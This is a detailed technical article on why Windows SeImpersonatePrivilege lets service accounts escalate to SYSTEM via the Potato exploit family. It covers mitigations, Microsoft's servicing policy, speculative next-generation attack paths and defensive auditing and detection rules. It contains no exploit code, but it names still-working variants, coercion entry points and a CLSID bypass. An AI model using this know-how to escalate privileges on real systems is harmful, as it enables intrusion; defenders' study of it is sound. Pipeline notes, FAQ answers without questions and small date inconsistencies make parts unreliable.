"if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM" -- Andrea Pierini; "a deliberately provocative shortcut obviously, but it's not far from the truth" -- Clement Labro's gloss on the same line [@labro-2020-printspoofer-post] flowchart TB Priv["SeImpersonatePrivilege, default-assigned to LOCAL SERVICE and NETWORK SERVICE. Removing this breaks every service that impersonates clients."] API["ImpersonateNamedPipeClient, shipped since XP/Server 2003. Removing this breaks every named-pipe RPC server."] Doctrine["MSRC servicing criteria: WSH is a safety boundary, not a security boundary. Changing this commits Microsoft to a structural-close servicing cadence."] Center["Service-account to SYSTEM"] Priv --> Center API --> Center Doctrine --> Center

The original focus paragraph that seeded this article mentioned "RBAC for services" as one of Microsoft's mitigations. The Stage 0a focus-premise audit found this phrase to be non-standard Windows terminology and explicitly retracted it; Microsoft has never shipped a Windows-side RBAC architecture for services. Azure RBAC and Microsoft Entra RBAC are cloud-side authorisation systems and do not gate the local SeImpersonatePrivilege at all. Section 6.6 returns to this retraction in full.

If the primitive is a closed three-piece system, what has Microsoft actually shipped in the eighteen years since Cerrudo? Five containment mitigations -- each of which narrows the surface around the primitive without closing it.

6. Five Mitigations and the Surface None of Them Closes

Microsoft has not been idle. Over nineteen years of service hardening they have shipped Service SIDs, restricted tokens, the Less-Privileged AppContainer model, group Managed Service Accounts, and the three-phase DCOM hardening of CVE-2021-26414. Each closes a real surface. None of them closes the primitive. The pattern is too consistent to be accidental.

6.1 Service SID isolation (Vista, 2007)

Vista shipped per-service SIDs of the form NT SERVICE\<name> -- a SID generated on the fly from the service's name and attached to the service-process token. Forshaw's The Art of Becoming TrustedInstaller is the canonical reference for the derivation: "The SID itself is generated on the fly as the SHA1 hash of the uppercase version of the service name" [@forshaw-2017-08-trustedinstaller]. Service SIDs are also documented as part of the SCM service-security model [@ms-learn-service-security].

A SID of the form `NT SERVICE\` derived as the SHA1 hash of the uppercased service name. Service SIDs let an ACL grant access to a specific service without granting access to every service running under the same account. When `SERVICE_SID_TYPE_UNRESTRICTED` is configured, the Service SID is added to the service-process token as a regular group SID.

Closes: lateral movement between services sharing an account. A process for service A cannot, by Service SID alone, open files ACL'd to service B's Service SID (NT SERVICE\B), even though both run as NETWORK SERVICE.

Does NOT close: vertical movement to SYSTEM via NETWORK SERVICE. Forshaw's April 2020 Sharing a Logon Session a Little Too Much documents the LSASS cached-token defect that underpins GodPotato: even with Service SIDs in place, the local logon session that LSASS retrieves for a same-machine authentication is the session's token, not the caller's token, which is exactly the structural property GodPotato weaponises [@forshaw-2020-04-sharing-logon-session].

6.2 Restricted and write-restricted service tokens (Vista 2007, backport via MS09-012)

SERVICE_SID_TYPE_RESTRICTED is the SCM service-SID setting that wraps the service-process token in a write-restricted restricting-SID set (adding the write-restricted SID S-1-5-33); for restricted operations the kernel performs the access check twice (once against the regular group SIDs, once against the restricting set) and grants only the intersection. Forshaw's January 2020 empirical assessment is the canonical study of what these settings actually accomplish: "In the past few years there's been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege" [@forshaw-2020-01-empirical-wsh].

A token marked with a *restricting SID* set in addition to its regular group SIDs. The kernel grants access only when both sets satisfy the ACL. Configured per-service via `SERVICE_SID_TYPE_RESTRICTED`; the resulting token is write-restricted (marked with the write-restricted SID `S-1-5-33`), so the restricting set gates write access. The intent is to prevent a compromised service from touching arbitrary objects outside an explicit allow-list of restricting SIDs.

Closes: the compromised service's ability to write to (or read, depending on configuration) arbitrary objects outside its restricting-SID set.

Does NOT close: SeImpersonatePrivilege is not revoked. A restricted token can still call ImpersonateNamedPipeClient and CreateProcessWithTokenW. The privilege gate is orthogonal to the restricting-SID gate.

6.3 LPAC (Less-Privileged AppContainer) for select services (Windows 10+)

Some Microsoft components opt into the AppContainer model with the Less-Privileged variant: the Edge browser broker, certain Defender child processes, parts of the DNS Client and Web Account Manager stacks. Inside an LPAC, the process runs with a deny-all token capabilities profile and must declare every Win32 capability it intends to use. The sibling AppContainer and LowBox Tokens article (2026-05-12) covers the model in depth.

Closes: the attack surface of a few specific Microsoft-shipped contained services.

Does NOT close: the LOCAL SERVICE and NETWORK SERVICE population this article is about is not LPAC-contained by default. Declaring an LPAC service requires rewriting the service to operate inside an AppContainer, which most product teams do not undertake.

Building an LPAC service is not a configuration flag; it is an architectural commitment. The service must declare every Win32 capability it uses, must be packaged through the modern app installer pipeline, and must accept the deny-by-default file-system view that the LPAC sandbox enforces. The cost is real for legacy code -- file paths and registry keys the service has historically reached without scrutiny become inaccessible, and IPC patterns that assumed a normal token need to be re-engineered through capability-mediated brokers. Even Microsoft uses LPAC narrowly. Third-party adoption among independent software vendors that ship NETWORK SERVICE workloads is essentially nil. The mitigation that *would* containerise the impersonation surface is technically available; in practice almost nobody uses it.

6.4 group Managed Service Accounts (gMSA, Server 2012+)

gMSA is Microsoft's solution to the credential-hygiene problem for service accounts: a domain-managed identity whose 240-byte password is rotated automatically by the KDS Root Key, retrieved by authorised hosts via Group Policy, and never typed by a human [@ms-learn-gmsa-overview].

Closes: domain-credential exposure for service accounts. A service no longer has a memorable password an admin will reuse; the credential lives in AD and is rotated on a schedule.

Does NOT close: anything to do with SeImpersonatePrivilege on the local box. gMSA is a credential-hygiene mitigation, not a privilege-escape mitigation. A service running under a gMSA still holds the same default service-account privileges, and the SilverPotato-class cross-host coerce-and-relay flow [@pierini-2024-silverpotato-post; @nvd-cve-2024-38061] directly exploits a chain that gMSA does not protect against (per-variant patches like CVE-2024-38061 close instances, not the class).

6.5 CVE-2021-26414 three-phase DCOM hardening

CVE-2021-26414 raised the minimum DCOM client authentication level to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY. The rollout was deliberately gradual: phase 1 (2021-06-08) opt-in via registry, phase 2 (2022-06-14) opt-out via registry, phase 3 (2023-03-14) enforced with no opt-out [@nvd-cve-2021-26414].

Closes: the original RottenPotato and JuicyPotato OBJREF-with-attacker-OXID chain on phase-3-enforced builds. The DCOM activation surface those variants depended on is meaningfully harder after phase 3.

Does NOT close: anything that does not depend on DCOM activation. GodPotato (RPCSS OXID handling, not DCOM activation) remains functional [@beichendream-godpotato-readme]; PrintSpoofer / CoercedPotato (non-DCOM RPC coercion) remain functional [@labro-2020-printspoofer-post; @prepouce-coercedpotato-repo]; JuicyPotatoNG (September 2022) found a bypass on the DCOM side via the PrintNotify CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} [@antoniococo-juicypotatong-repo]; SilverPotato used a different CLSID and a cross-host relay until Microsoft fixed it as CVE-2024-38061 in July 2024 [@pierini-2024-silverpotato-post; @nvd-cve-2024-38061] -- a per-variant fix that illustrates exactly why CVE-2021-26414 does not address the cross-host coerce-and-relay class as a whole.

6.6 The mitigation that does not exist: "RBAC for services"

Windows has shipped no unified RBAC architecture for local services. The SCM provides per-service SDDL controls, the file system and registry provide per-resource ACLs everywhere, and Service SIDs let ACLs name a specific service identity -- but "RBAC for services" as a single named mechanism is non-standard Windows terminology. Azure RBAC and Microsoft Entra RBAC are cloud-side authorisation systems and do not gate the local SeImpersonatePrivilege at all. The §5 Sidenote on the Stage 0a focus-premise retraction covers the audit-trail framing; this subsection states the reader-facing point.

flowchart TB M1["Service SID Isolation, Vista 2007"] M2["Restricted and Write-Restricted Tokens, Vista 2007 plus MS09-012 backport"] M3["LPAC for select services, Windows 10 plus"] M4["gMSA, Server 2012 plus"] M5["CVE-2021-26414 three-phase DCOM hardening, 2021-2023"] Surface1["Closes lateral movement between same-account services"] Surface2["Closes write access outside restricting-SID set"] Surface3["Closes blast radius of select Microsoft-shipped services"] Surface4["Closes domain-credential exposure"] Surface5["Closes DCOM activation chain, Rotten and Juicy"] Core["Service-account-to-SYSTEM, primitive remains open"] M1 --> Surface1 M2 --> Surface2 M3 --> Surface3 M4 --> Surface4 M5 --> Surface5 Surface1 -. "does not reach" .-> Core Surface2 -. "does not reach" .-> Core Surface3 -. "does not reach" .-> Core Surface4 -. "does not reach" .-> Core Surface5 -. "does not reach" .-> Core

Mitigation	What it closes	What it does NOT close	Primary
Service SID Isolation (Vista 2007)	Lateral movement between services sharing an account	Vertical SYSTEM via NETWORK SERVICE LSASS-cached-token defect	[@forshaw-2017-08-trustedinstaller; @forshaw-2020-04-sharing-logon-session]
Restricted / Write-Restricted Tokens	Write access to non-restricting-SID objects	`SeImpersonatePrivilege` still present; `CreateProcessWithTokenW` still works	[@forshaw-2020-01-empirical-wsh]
LPAC (Windows 10+)	Select-services blast radius	NETWORK / LOCAL SERVICE population not LPAC-contained by default	sibling AppContainer article
gMSA (Server 2012+)	Domain-credential exposure	Local `SeImpersonate`; SilverPotato-class cross-host relay	[@ms-learn-gmsa-overview]
CVE-2021-26414 phase 3 (2023-03-14)	DCOM activation chain (Rotten/Juicy)	GodPotato (RPCSS), PrintSpoofer (non-DCOM), JuicyPotatoNG (Sept 2022)	[@nvd-cve-2021-26414]

Note: None of this section is an indictment of the mitigations. Each one closes a meaningful surface, and a NETWORK SERVICE host with all five active is materially harder to attack than a host without them. But the surface they collectively leave open -- the SeImpersonatePrivilege plus ImpersonateNamedPipeClient plus coercion-API combination -- is the surface that every shipping Potato variant lives on. The gap is not a missing patch. The gap is the design.

Microsoft has shipped five mitigations in nineteen years. Every one narrows the surface around the primitive. None of them closes it. The pattern is too consistent to be accidental. So what is the policy that produces this pattern?

7. The MSRC Servicing-Criteria Carve-Out

Most of these exploits allow an attacker to break the WSH (Windows Service Hardening) boundary, enabling privilege escalation from a limited service to SYSTEM: a common scenario when dealing with web services like IIS or MSSQL. Interestingly, Microsoft does not consider WSH a security boundary but rather a safety boundary; for this reason, many Potato exploits work (and have been working) on fully updated Windows systems. -- Andrea Pierini and Antonio Cocomazzi, Troopers 24 [@pierini-cocomazzi-troopers24-talk]

This is the Microsoft-position-as-stated-to-researchers anchor for the entire article. The MSRC Windows Security Servicing Criteria page [@msrc-windows-security-servicing-criteria] is the policy-document anchor with the same content: the two-question test "Does the vulnerability violate the goal or intent of a security boundary or a security feature? Does the severity of the vulnerability meet the bar for servicing?" If either answer is no, the vulnerability is considered for the next version of Windows but is not addressed through a security update.

Service-to-SYSTEM escalation across the Windows Service Hardening boundary is not a violation of a security boundary. It is a violation of a safety boundary. The distinction is doctrinal and explicit. Microsoft will fix specific token-source primitives -- LocalPotato got CVE-2023-21746, FakePotato got CVE-2024-38100 -- but the class is, on the record, not within scope for security servicing [@nvd-cve-2023-21746; @nvd-cve-2024-38100].

Why? Walk through each of the three closure paths Microsoft could in principle take, and the cost of each.

7.1 Revoke `SeImpersonatePrivilege` from NETWORK SERVICE and LOCAL SERVICE

The cleanest fix in the model: drop the privilege from the default-assignment list documented on the LOCAL SERVICE and NETWORK SERVICE account pages [@ms-learn-localservice; @ms-learn-networkservice]. Every Potato variant that ends in CreateProcessWithTokenW fails immediately.

Cost. Every RPC server, web server, database server, and Office service that needs to act on a client's behalf breaks. The privilege exists because services need it. IIS application pools cannot impersonate authenticated users; SQL Server cannot enforce per-login row security; Exchange cannot operate on mailboxes under the connected user's identity; the print spooler cannot enforce per-user printer ACLs; the file server cannot enforce per-user file ACLs. The 2003 service-hardening pivot would be reversed -- services would have to run as SYSTEM again to do the work they need to do, which is precisely the worm-target population Microsoft spent the early 2000s migrating away from.

7.2 Declare local DCOM activation a security boundary and service it

This was the partial path Microsoft did take with CVE-2021-26414 [@nvd-cve-2021-26414]: tighten the DCOM activation surface and ship the change in three phases over twenty-one months. But declaring all local DCOM activation a security boundary requires a serviceable-CVE pipeline for every cross-session COM activation, every cross-integrity-level activation, every weakly-authenticated marshalled OBJREF.

Cost. MSRC has declined to take on that workload. The on-the-record case is RemotePotato0 [@antoniococo-remotepotato0-repo], which was classified "Won't Fix" by MSRC as the first explicit declination in the lineage -- documented in Forshaw's 2021 retrospective as still unpatched at the time of writing [@forshaw-2021-10-relaying-dcom-pz]. RemotePotato0 is the empirical evidence that Microsoft has chosen to live with a known cross-session DCOM relay rather than commit to a structural close.

7.3 Deprecate `ImpersonateNamedPipeClient`

Remove the named-pipe-server impersonation API from the Win32 surface. Mark it deprecated. Stop callers from using it. Provide a replacement that requires explicit per-request token plumbing.

Cost. Most Win32 RPC servers stop being able to impersonate their callers. The SMB redirector, the Print Spooler, the EFS RPC server, and a long tail of named-pipe RPC servers depend on this specific API; their alternatives all compose into the same kernel-side call. The replacement -- a per-request capability handle threading through every RPC binding -- would be a multi-year ABI change with no clean migration path for legacy binaries.

flowchart LR Start["Closure path"] A["A. Revoke SeImpersonatePrivilege from NETWORK SERVICE and LOCAL SERVICE"] B["B. Declare local DCOM activation a security boundary, service every CVE"] C["C. Deprecate ImpersonateNamedPipeClient"] Cost1["Breaks IIS, Exchange, MSSQL, Office services"] Cost2["Per-CVE servicing pipeline for every cross-session COM activation, MSRC has declined"] Cost3["Breaks SMB redirector, Print Spooler, EFS, every named-pipe RPC server that impersonates"] Converge["Compatibility cost Microsoft has not accepted"] Start --> A Start --> B Start --> C A --> Cost1 --> Converge B --> Cost2 --> Converge C --> Cost3 --> Converge

RemotePotato0 [@antoniococo-remotepotato0-repo] holds a particular place in the lineage because it is the first variant for which MSRC's "Won't Fix" classification became public on the record. Forshaw's 2021 Project Zero retrospective notes the variant as "currently unpatched as of October 2021" [@forshaw-2021-10-relaying-dcom-pz], and Microsoft did not subsequently issue a CVE for it. The Stage 5 outline cross-references the sibling Potato Family article (2026-05-31) for variant detail; in this article RemotePotato0 functions as the empirical proof that the carve-out is not a hypothetical preference but a shipped policy choice.

Key idea: Nineteen years. Five mitigations. Three closure paths Microsoft has explicitly declined to take. The primitive is not unpatched. It is documented-as-policy not to be patched.

Microsoft has chosen, on the record, to treat this boundary as a safety boundary rather than a security boundary. Is that an architectural failure -- or is it a rational policy choice under a deeper structural constraint? Hardy 1988 has an answer.

8. The Hardy Ceiling

Norm Hardy named the class in 1988. Forty years later, Windows is still demonstrating it. The confused-deputy attack surface is not a Microsoft mistake; it is the predictable behaviour of any identity-and-ACL system in which a server holds more authority than its clients and acts on client requests [@hardy-1988].

The argument generalises beyond Windows. Any system that lets a process inherit ambient authority from its identity, and then lets that process act on requests from less-authorised principals, has a confused-deputy surface by construction. The only complete defence is capability discipline: bind authority to operations rather than to running identities, and never let a process exercise authority it was not explicitly handed [@hardy-1988]. Lampson's 1971 access-matrix paper is the formal substrate the argument depends on [@lampson-1971].

Windows is not a capability system. It is an identity-and-ACL system, as Cutler's NT 3.1 team chose in 1993 [@ms-learn-windows-internals]. As long as that remains true, some version of "service-account to higher-privileged identity" is reachable, and the only question is which specific token-source primitive is currently in play. Microsoft's eighteen-year per-CVE response cadence is consistent with that ceiling. Each individual token source is fixable; the class is not.

The capability-systems lineage -- KeyKOS, EROS, Coyotos, seL4 -- spent four decades demonstrating that the confused-deputy class is closeable in principle. In a capability system, when Hardy's user passed the FORTRAN compiler the path to the billing file as a debug-output target, the OS would have handed the compiler a write capability only for the file the *user* could write -- not for `(SYSX)BILL`. The compiler could not have damaged the bill even if it tried. seL4 has a machine-checked proof of this property. But none of those systems is the Windows service-compatibility envelope, and porting Windows to a capability substrate is not on any public roadmap. The road exists; Microsoft has not taken it.

The closest in-architecture approximations Windows has shipped are narrow: AppContainer and LowBox tokens (the sibling AppContainer article 2026-05-12) bind a subset of authority to declared capabilities for select Microsoft components; the Adminless / Administrator Protection feature (sibling Adminless article 2026-05-10) binds elevation authority to per-action prompts for interactive admins. Both are partial applications of the capability principle within an otherwise identity-and-ACL system. Neither extends to the service-account population this article is about.

Key idea: Windows is an identity-and-ACL system. As long as it remains one, the confused-deputy class is structurally present, and the Potato lineage is its Windows-specific instantiation.

If the ceiling is structural and Microsoft has chosen the doctrine to match, what is the offensive-research community working on next? And what should defenders be doing in the meantime?

9. Open Problems

The closure of LocalPotato in 2023, SilverPotato (CVE-2024-38061) in July 2024, and FakePotato (CVE-2024-38100) in July 2024 did not slow the lineage. GodPotato remains functional. The supply of coercion APIs is structurally large. Microsoft has shipped no policy change. The four open questions below define what the lineage looks like through the rest of the decade.

9.1 The coercion-API treadmill

Generation 4 demonstrated that any Windows RPC interface accepting an attacker-supplied path or endpoint and resolving it server-side under a privileged identity is a viable token source. CoercedPotato's MS-EFSR catalogue alone lists fourteen entry points (two marked NOT WORKING) [@prepouce-coercedpotato-repo], with additional protocols (MS-RPRN, MS-FSRVP, MS-DFSNM) in the same family. Microsoft patches per CVE -- PrintNightmare cluster around MS-RPRN, targeted MS-EFSR fixes -- but the supply is not exhausted, and there is no public Microsoft commitment to exhaustive enumeration or class-level closure.

9.2 GodPotato's RPCSS OXID path

Three years after the three-phase CVE-2021-26414 DCOM hardening completed [@nvd-cve-2021-26414], GodPotato remains functional across the README's tested Windows matrix (Server 2012-2022 / Windows 8-11) [@beichendream-godpotato-readme]. No public Microsoft patch has been issued for the underlying defect through mid-2026. The architectural question -- is RPCSS itself the right place to harden, or is the LSASS cached-token defect Forshaw documented in April 2020 [@forshaw-2020-04-sharing-logon-session] the right place -- remains open. Microsoft has assigned no CVE.

9.3 Credential Guard does not stop this

Credential Guard protects the NTLM hash and Kerberos TGT in the LSASS Isolated User Mode trustlet. It does not protect against runtime impersonation of an already-issued token. The boundary between credential-theft mitigations and impersonation mitigations is frequently confused.

Credential Guard's actual scope is narrower than its name suggests. The mitigation moves long-term authenticators -- the NT hash, the Kerberos TGT, and certain ticket-granting material -- into an isolated user-mode trustlet whose memory the regular kernel cannot read. None of that touches the runtime token plumbing the Potato lineage exercises. The token you receive from ImpersonateNamedPipeClient is not a credential and is not held in LSASS-isolated memory; Credential Guard cannot see it.

Note: Practitioners frequently treat Credential Guard and Virtualisation-Based Security as a generic answer to "Windows privilege-escalation risk." For the Potato family they are not. A Credential-Guard-enabled host that runs IIS as NETWORK SERVICE is as vulnerable to PrintSpoofer / CoercedPotato / GodPotato as a host without VBS. The category error matters operationally: a security team that buys Credential Guard expecting it to mitigate this primitive is misallocating defensive budget.

9.4 The "service boundary" re-definition Microsoft has quietly avoided

Adminless / Administrator Protection -- the 2024-2025 feature that re-frames local admin identity as a per-action consent surface [@ms-learn-admin-protection] (covered in the sibling Adminless article 2026-05-10) -- explicitly excludes services from its new boundary.

The Adminless documentation scopes the feature to interactive administrator accounts on a device [@ms-learn-admin-protection]; services, MSAs, gMSAs, and virtual accounts are out of scope by construction because none of them is an interactive admin account. The new boundary applies to elevation-prompt consent for interactive admins, not to service-account workloads. The open question is whether Microsoft will ever extend the Adminless boundary to include service accounts. As of mid-2026, the answer is not on the public roadmap.

9.5 Generation-6 candidates

Three candidate paths for the next generation of the lineage, none with a pushbutton PoC on the scale of HotPotato / JuicyPotato / PrintSpoofer / GodPotato as of mid-2026:

Kerberos-only loopback coercion. The existing NTLM-reflection mitigations target NTLM specifically; a coercion primitive that lands as a Kerberos AP-REQ to the same loopback endpoint would sidestep them.
Virtual-account / gMSA token-state defects. Forshaw's April 2020 analysis [@forshaw-2020-04-sharing-logon-session] established that the LSASS cached-token logic has surprising behaviours under same-machine authentication; the gMSA-account variant of those edge cases has not been publicly explored.
Cross-host extensions beyond ADCS. SilverPotato's coerce-and-relay chain into ADCS infrastructure [@pierini-2024-silverpotato-post] -- patched as CVE-2024-38061 in July 2024 [@nvd-cve-2024-38061] but exemplifying an open class -- is the strongest current exemplar for the "Generation 6" archetype: cross-host coerce-and-relay attacks that combine the existing local impersonation primitive with off-box authentication targets. LDAP, WinRM, and MSSQL-with-cert-auth are obvious next targets for the same class; what matters for taxonomy is the cross-host shape, not the patched-or-unpatched status of any specific variant.

If the lineage is not closing, what should a defender actually do today?

10. Defending, Detecting, and (Carefully) Removing the Privilege

Three operational questions: which accounts hold the privilege on your box, can you remove it, and how do you detect when someone is actually using it?

10.1 Auditing which accounts hold `SeImpersonatePrivilege`

The first defensive action is enumeration -- not removal. Concrete commands, in increasing order of detail:

whoami /priv -- per-process self-check from any shell. Reports the token's privileges in the form the article opens with.
secedit /export /cfg secpol.cfg -- full local-policy export. Grep the output for SeImpersonatePrivilege to see every SID the local policy grants it to.
accesschk.exe -a SeImpersonatePrivilege -- the Sysinternals AccessChk tool [@ms-learn-accesschk] enumerates the effective holders directly from the LSA policy database.
Get-NtTokenPrivileges from James Forshaw's NtObjectManager PowerShell module [@forshaw-ntobjectmanager-repo] -- the same data, scriptable, with the broader NtObjectManager surface available for follow-up (named-pipe enumeration, token-handle leak search, kernel-object introspection).
Invoke-PrivescCheck from Clement Labro's PrivescCheck module [@labro-privesccheck-repo] -- the canonical local-privesc check-list. The output includes SeImpersonatePrivilege presence as one of approximately forty enumerated checks.

Tool	Author	What it reports
AccessChk (Sysinternals)	Mark Russinovich	Effective permissions, account-privilege enumeration via `-a` [@ms-learn-accesschk]
NtObjectManager	James Forshaw	`Get-NtTokenPrivilege`, named-pipe enumeration, token-handle leak search [@forshaw-ntobjectmanager-repo]
PrivescCheck	Clement Labro	Canonical local-privesc check-list incl. `SeImpersonatePrivilege` presence [@labro-privesccheck-repo]

{` // Logic of: secedit /export /cfg secpol.cfg ; grep SeImpersonate const secpol = readPolicyExport(); // produced by secedit const holders = secpol['SeImpersonatePrivilege'] || [];

console.log('SIDs holding SeImpersonatePrivilege:'); for (const sid of holders) { console.log(' ' + sid); }

// Typical default on a server-style install: // S-1-5-19 (NT AUTHORITY\LOCAL SERVICE) // S-1-5-20 (NT AUTHORITY\NETWORK SERVICE) // S-1-5-32-544 (BUILTIN\Administrators) // S-1-5-6 (NT AUTHORITY\SERVICE) `}

10.2 Removing the privilege where you can

The policy path is documented: Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Impersonate a client after authentication [@ms-learn-impersonate-policy]. The temptation, especially after reading an article like this one, is to remove SeImpersonatePrivilege from NETWORK SERVICE wholesale.

Do not do that. It will break IIS, Exchange, SQL Server, and most other Windows server products -- the same set the 2003 service-hardening pivot was designed to support. The realistic defensive approach is narrower: audit first, understand the dependency surface, then narrow the assignment to the specific service accounts that need it on the specific hosts where they run. On hosts that do not run an RPC-impersonating workload (jump boxes, build agents, certain hardened-management hosts), the privilege can sometimes be removed safely from the unused well-known accounts.

Note: The single most common mistake after reading any Potato writeup is to remove the privilege from NETWORK SERVICE on a production host. Doing so breaks IIS (per-user authentication fails), Exchange (mailbox impersonation fails), SQL Server (per-login row security fails), the SMB redirector (file-server impersonation fails), the Print Spooler (per-user printer ACLs fail), and most third-party Win32 service products. The privilege exists because services need it. Audit before you remove. Remove only after you have positively identified which production services on this host depend on the privilege and confirmed none of them does.

*Hidden behind a spoiler intentionally, so a skimming reader does not accidentally remove the privilege from production NETWORK SERVICE.* Open `gpedit.msc` (or the Group Policy Management Console for a domain-joined host). Navigate Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Impersonate a client after authentication. The right-hand pane lists the SIDs holding the privilege. Note the current list. Do not change it. Compare it against the audit output from Section 10.1. If the local list and the AccessChk output disagree, you have a domain-pushed policy override worth tracing. If they agree and you have a documented business reason to remove a specific account, change the policy for that specific account only, and confirm on a non-production host that the dependent services still function.

10.3 Detection signatures

Detection in this space breaks into two abstractions: primitive-level rules that match the named-pipe pattern every Potato variant generates, and named-tool rules that match a specific binary's fingerprint.

The primitive-level open-source reference is the Elastic detection rule Privilege Escalation via Rogue Named Pipe [@elastic-rogue-named-pipe-rule] (as of June 2026; the cited URL pins to the master HEAD), rule_id 76ddb638-abf7-42d5-be22-4a70b0bf7241. The EQL queries Sysmon Event ID 17 (pipe-creation events) and matches paths in which a \pipe\ token appears after another path segment -- the canonical PrintSpoofer-style relay endpoint fingerprint. Because the rule looks for the pattern every Potato variant produces (a service-account process creating a named pipe whose path embeds a coercion-API hint), it survives binary rename, source-recompile, and most CLI variation.

The named-tool reference is the SigmaHQ LocalPotato rule [@sigmahq-localpotato-rule] (as of June 2026; the cited URL pins to the master HEAD), rule id 6bd75993-9888-4f91-9404-e1e4e4e34b77. Three OR-joined selectors: image path ending in \LocalPotato.exe; CLI fingerprint -i C:\ paired with -o Windows\; specific IMPHASH selectors E1742EE971D6549E8D4D81115F88F1FC and DD82066EFBA94D7556EF582F247C8BB5. Useful as a low-noise IOC tripwire; trivially evaded by binary rename or recompilation.

The Sigma LocalPotato rule is a perfectly competent detection rule for *the LocalPotato binary distributed at a specific commit*. It is essentially useless against the *technique*. An attacker recompiling LocalPotato from source breaks the IMPHASH selectors; renaming the output binary breaks the image-path selector; rewriting the CLI argument parsing breaks the third selector. The rule is brittle by construction, and the brittleness is structural to named-tool detection. The same point this article makes about Microsoft's per-CVE patches applies one level down: closing this binary does not close the technique; closing this technique does not close the primitive.

Note: Invest detection budget in the Elastic primitive-level rule (or equivalent) and accept the higher false-positive rate that comes with it. The named-tool rules are a useful low-noise tripwire but should not be the primary signal. The same logic that makes the privilege durable against per-CVE patches makes the named-tool rules ephemeral against re-tooling.

We have walked the eighteen-year history, named the three-piece system, surveyed the mitigations, articulated the Microsoft policy, hit the Hardy ceiling, scanned the open problems, and listed the operational tools. One thing remains: the eight misconceptions practitioners hold about this primitive that the article must explicitly correct.

11. FAQ -- Eight Misconceptions That Will Not Die

No. UAC (User Account Control) is an interactive-token consent surface for desktop logons; it gates whether an interactive admin can elevate to a full administrator token at consent-prompt time. Service accounts have no interactive logon and never see a UAC prompt. NETWORK SERVICE and LOCAL SERVICE inherit `SeImpersonatePrivilege` in their default token regardless of UAC settings [@ms-learn-localservice; @ms-learn-networkservice]; the Potato chain runs entirely under the service token without ever touching the interactive consent surface. No. Credential Guard protects long-term credentials (the NTLM hash, the Kerberos TGT) in an isolated user-mode trustlet whose memory the regular kernel cannot read. The Potato lineage does not steal a credential and does not call into LSASS-isolated memory -- see §9.3 for the architectural detail. The operational takeaway: Credential Guard and VBS are orthogonal to runtime token impersonation, and a security team buying VBS in response to Potato writeups is misallocating defensive budget. Not if the account holds `SeImpersonatePrivilege`. LOCAL SERVICE and NETWORK SERVICE both hold it by default and have it enabled in their default tokens [@ms-learn-localservice; @ms-learn-networkservice]. The gate is the privilege, not the account name. A service that has been "hardened" by moving from SYSTEM to NETWORK SERVICE still has the gate open. Real hardening requires either removing the privilege from the account on that specific host (with the compatibility risks Section 10.2 describes) or running the service under a custom account that does not get the privilege auto-granted. No. Microsoft has shipped CVEs for specific token-source primitives -- LocalPotato as CVE-2023-21746 [@nvd-cve-2023-21746], SilverPotato as CVE-2024-38061 [@nvd-cve-2024-38061], FakePotato as CVE-2024-38100 [@nvd-cve-2024-38100], the three-phase DCOM hardening as CVE-2021-26414 [@nvd-cve-2021-26414] -- but the underlying impersonation surface is documented-as-policy not to be addressed as a security boundary [@msrc-windows-security-servicing-criteria; @pierini-cocomazzi-troopers24-talk]. GodPotato remains functional across its tested README matrix (Server 2012-2022 / Windows 8-11) with no public Microsoft patch through mid-2026 [@beichendream-godpotato-readme]. PrintSpoofer and CoercedPotato variants remain functional on most hosts [@labro-2020-printspoofer-post; @prepouce-coercedpotato-repo]. The pattern is per-CVE closure of individual variants while the underlying privilege + coercion-API geometry remains in place. Both, but the architectural responsibility is Windows's. The privilege is a Windows design decision; the coerced-authentication primitives are Windows components (RPCSS, Print Spooler, EFS RPC server). A service developer cannot opt out of `SeImpersonatePrivilege` by writing better code -- the SCM grants the privilege as part of the account setup, not at the developer's request. A service developer *can* run under a custom account configured without the privilege, but most service code paths assume impersonation works (especially Win32-era code, where `RpcImpersonateClient` is the standard idiom) and break in subtle ways without it. Yes. IIS application pools cannot perform Windows-authenticated user impersonation; Exchange cannot run mailbox operations under the connecting user's identity; SQL Server cannot enforce per-login row security under Windows authentication; the SMB and EFS RPC servers cannot impersonate their callers [@ms-learn-impersonate-policy; @ms-learn-impersonatenamedpipeclient]. The MSRC policy text on the impersonation-policy page is explicit that the privilege is required for legitimate impersonation [@ms-learn-impersonate-policy]. Audit before you remove. No. The Adminless / Administrator Protection feature is a per-action consent surface for interactive administrators [@ms-learn-admin-protection]. Service accounts (services, MSAs, gMSAs, virtual accounts) are out of scope by construction because none of them is an interactive admin account. The new boundary does not apply to the service-account population this article is about. There is no public Microsoft roadmap to extend it. Because the named-pipe RPC server population (the SMB redirector, the Print Spooler, the EFS RPC server, and the long tail of pre-modern Win32 services) depends on this specific API, and the Microsoft-recommended alternatives (`RpcImpersonateClient`, the LSA-side variants) ultimately compose into the same kernel-side call -- §7.3 walks through the full ABI migration cost. The MSRC servicing carve-out [@msrc-windows-security-servicing-criteria] is the policy-level acknowledgement that the cost is not on the table.

12. The Line, Re-read

Bring the reader back to where this started: one line in whoami /priv.

SeImpersonatePrivilege  Impersonate a client after authentication  Enabled

Now you know what it means. The line ships in the default token of every IIS application pool worker, every SQL Server service step, every Exchange worker process, and every other LOCAL SERVICE / NETWORK SERVICE-derived account on every shipping Windows release. The line gates CreateProcessWithTokenW. The kernel-level token-substitution surface sits behind that gate. The named-pipe coercion API on the other side of the gate has shipped since Windows XP / Server 2003 and remains the dominant token source on the platform. Microsoft has shipped five containment mitigations in nineteen years -- each closes a real surface; none closes this primitive. The doctrinal articulation came at Troopers 24: Windows Service Hardening is a safety boundary, not a security boundary [@pierini-cocomazzi-troopers24-talk]. The 1988 ceiling that explains why is older than the operating system.

